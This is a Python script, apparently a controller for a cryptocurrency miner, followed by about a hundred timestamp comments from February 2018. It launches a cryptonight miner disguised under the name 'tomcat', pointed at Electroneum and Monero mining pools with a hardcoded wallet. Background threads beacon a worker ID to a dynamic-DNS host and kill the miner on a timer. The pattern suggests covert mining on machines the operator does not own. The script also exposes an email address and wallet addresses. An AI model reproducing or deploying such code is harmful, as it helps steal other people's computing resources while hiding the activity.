import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:57:05.140811
#2018-02-17 16:44:02.108857
#2018-02-17 18:33:07.150177
#2018-02-17 20:21:01.456166
#2018-02-17 22:08:01.328648
#2018-02-17 23:52:07.139181
#2018-02-18 01:43:01.743566
#2018-02-18 03:29:05.790489
#2018-02-18 05:17:05.211748
#2018-02-18 07:09:07.742711
#2018-02-18 08:57:05.873998
#2018-02-18 10:44:03.980636
#2018-02-18 12:32:07.417530
#2018-02-18 14:19:06.647992
#2018-02-18 16:10:08.464010
#2018-02-18 17:57:06.771903
#2018-02-18 19:43:06.203254
#2018-02-18 21:28:01.515582
#2018-02-18 23:17:05.696176
#2018-02-19 01:04:04.934484
#2018-02-19 02:51:02.120285
#2018-02-19 04:38:06.024230
#2018-02-19 06:22:07.901477
#2018-02-19 08:11:05.581041
#2018-02-19 10:01:04.740781
#2018-02-19 11:50:05.275963
#2018-02-19 13:37:06.466479
#2018-02-19 15:24:09.262742
#2018-02-19 17:12:06.988936
#2018-02-19 18:59:04.814607
#2018-02-19 20:47:01.538283
#2018-02-19 22:34:07.819184
#2018-02-20 00:19:08.200488
#2018-02-20 02:07:04.177076
#2018-02-20 03:56:06.196976
#2018-02-20 05:41:07.761756
#2018-02-20 07:27:08.100287
#2018-02-20 09:12:06.015052
#2018-02-20 10:55:01.806199
#2018-02-20 12:43:06.697783
#2018-02-20 14:27:06.966832
#2018-02-20 16:11:08.632155
#2018-02-20 17:56:09.459094
#2018-02-20 19:48:05.159320
#2018-02-20 21:38:05.579094
#2018-02-20 23:19:01.379426
#2018-02-21 01:02:04.924760
#2018-02-21 02:49:07.928036
#2018-02-21 04:38:07.435016
#2018-02-21 06:26:06.734870
#2018-02-21 08:10:11.733262
#2018-02-21 09:56:08.813843
#2018-02-21 11:45:06.589700
#2018-02-21 13:34:06.085880
#2018-02-21 15:19:08.821681
#2018-02-21 17:09:07.453957
#2018-02-21 18:56:08.622040
#2018-02-21 20:46:05.440675
#2018-02-21 22:30:10.780519
#2018-02-22 00:20:01.414337
#2018-02-22 02:07:06.931346
#2018-02-22 03:52:03.791746
#2018-02-22 05:38:07.014738
#2018-02-22 07:23:04.603225
#2018-02-22 09:10:05.119069
#2018-02-22 10:58:07.080551
#2018-02-22 12:45:12.009461
#2018-02-22 14:32:01.382290
#2018-02-22 16:18:05.429493
#2018-02-22 18:06:06.033437
#2018-02-22 19:56:03.852692
#2018-02-22 21:45:07.859728
#2018-02-22 23:33:04.787096
#2018-02-23 01:20:07.847837
#2018-02-23 03:06:04.997538
#2018-02-23 04:52:02.120625
#2018-02-23 06:37:05.057193
#2018-02-23 08:26:01.962952
#2018-02-23 10:41:06.357457
#2018-02-23 12:38:05.371566
#2018-02-23 14:22:11.431181
#2018-02-23 16:13:04.455738
#2018-02-23 17:59:08.457977
#2018-02-23 19:46:02.238728
#2018-02-23 21:29:07.059341
#2018-02-23 23:17:07.934653
#2018-02-24 01:12:03.952030
#2018-02-24 03:04:01.895354
#2018-02-24 04:50:07.339676
#2018-02-24 06:35:06.900205
#2018-02-24 08:24:04.277285
#2018-02-24 10:11:05.782487
#2018-02-24 12:06:02.163068
#2018-02-24 13:53:01.597245
#2018-02-24 15:45:06.139940
#2018-02-24 17:42:07.710360
#2018-02-24 19:26:07.734468
#2018-02-24 21:17:01.726742
#2018-02-24 23:54:07.394491
#2018-02-25 03:35:03.527279
#2018-02-25 07:11:05.382757